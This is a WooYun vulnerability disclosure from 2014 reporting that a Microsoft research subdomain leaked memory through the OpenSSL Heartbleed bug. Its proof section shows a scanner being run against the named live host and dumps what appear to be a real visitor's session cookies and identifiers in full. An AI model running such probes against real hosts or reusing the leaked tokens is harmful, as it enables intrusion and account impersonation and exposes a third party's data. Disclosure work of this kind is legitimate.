microsoft.com某站点存在OpenSSL HeartBleed漏洞可读Cookie

admin
admin
admin
139509
文章
114
评论
2015年8月4日17:37:02评论237 views字数 250阅读0分50秒阅读模式
摘要

2014-11-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-24: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(9) 关注此漏洞

缺陷编号: WooYun-2014-82633

漏洞标题: microsoft.com某站点存在OpenSSL HeartBleed漏洞可读Cookie

相关厂商: microsoft.com

漏洞作者: lijiejiemicrosoft.com某站点存在OpenSSL HeartBleed漏洞可读Cookie

提交时间: 2014-11-09 12:55

公开时间: 2014-12-24 12:56

漏洞类型: 系统/服务补丁不及时

危害等级: 中

自评Rank: 6

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

1人收藏

漏洞详情

披露状态:

2014-11-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

microsoft.com某站点存在OpenSSL HeartBleed漏洞,验证可读Cookie

详细说明:

https://ds3.research.microsoft.com

存在OpenSSL HeartBleed漏洞。

验证可读 cookie。

漏洞证明:

microsoft.com某站点存在OpenSSL HeartBleed漏洞可读Cookie

我只读ascii字符。

code 区域 
D:/Scanner/openSSL>new_test.py ds3.research.microsoft.com
 Connecting...
 Sending Client Hello...
 Waiting for Server Hello...
  ... received message: type = 22, ver = 0302, length = 58
  ... received message: type = 22, ver = 0302, length = 5466
  ... received message: type = 22, ver = 0302, length = 525
  ... received message: type = 22, ver = 0302, length = 4
 Sending heartbeat request...
  ... received message: type = 24, ver = 0302, length = 16384
 Received heartbeat response:
 [email protected][...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...
 I.....4.2...#.TML, like Gecko) Chrome/38.0.2125.111 Safari/537.36..Referer: http
 s://www.google.com/..Accept-Encoding: gzip,deflate,sdch..Accept-Language: en-US,
 en;q=0.8..Cookie: MC1=GUID=4e3448c8d79b4d4aa81071b43a78de0b&HASH=4e34&LV=20143&V
 =4&LU=1393696433656; A=I&I=AxUFAAAAAAB7CQAAmpSqxu5E+Krf9iqiJBT3EA!!&V=4; WT_NVR_
 RU=0=msdn:1=:2=; msdn=L=en-US; msresearch=%7B%22version%22%3A%225.0%22%2C%22stat
 e%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A13
 97427833081%7D%2C%22lastinvited%22%3A1407896151170%2C%22userid%22%3A%22139742783
 30814520944328978658%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p218292485%
 22%2C%22p234872763%22%5D%2C%22graceperiod%22%3A5%2C%22trackertimestamp%22%3A0%7D
 ; _wt.user-736484=WT3smkaDVP04tKDsICBO78vzTOfmRGF9kr4D8pDCJNqhxod3lzVJUHj0FYF_lz
 UHe5czp6DBBMYUTJmYzKiEZOmSWEyyhKiWZt4LHFpo1aePA2TXTYzYKPEXF5lIOYVs0iymmyPAWnFoAQ
 sPvy4nud9_B79we84ls2i0QRNqpRbv-CWV3p89_PO2iAemiK4v5w5zcr1GjeaLeUyw0Nc; _wt.contr
 ol-736484-ta_FreeDownlaods=WT3BloHw5jb4Lqr21ktnTLR60cBtOEhxFU4lBDusqxRzj3rM3Nrnp
 Nljm03sS5xi-9fnqYYjiCuSqyyb_H74MBZmcH-HP2wvDNTdlUtsgy8Ywp9piB3JJYO2C5Tllw41vvOm5
 zlhqtUSIBwbly86oLQHOmJRy9H3KyXBleB6o1p9HOO52PDtoQed3_agAtgjMiXW3_EEPUgsDwFrPFhRJ
 dZw3hQbVV3QgyEABgW4VVd6VUdm7jNcLwt2DY4qXvogbIMNtQK03OKJYhugiUB; MSFPC=ID=4e3448c
 8d79b4d4aa81071b43a78de0b&CS=3&LV=201409&V=1; ANON=A=9EE784A569939CAEF3535474FFF
 FFFFF&E=fba&W=1; NAP=V=1.9&E=f60&C=BsqNVzS2WcEsPHKmzRwfU25ZKDFhLjrHS0uSQkLdUNlD6
 5zGyM6DwA&W=1; MUID=146D9A1D651B66A93C639FED611B6451; smcexpticket=100; omniID=1
 397427742511_a41a_868c_fccd_ca3032ac1f8c; s_cc=true; s_sq=%5B%5BB%5D%5D; TocPosi
 tion=1; WT_FPC=id=1e4bbeb0-f358-4a25-be79-c94f5dd99600:lv=1415220010228:ss=14152
 18748608 ..:Iz
 
 WARNING: server returned more data than it should - server is vulnerable!

修复方案:

upgrade

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-11-09 13:27 | Jack.Chalres ( 实习白帽子 | Rank:39 漏洞数:15 | ..............)

    1

    忽略..

  2. 2014-11-09 22:05 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    1

    难道微软也用OpenSSL?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin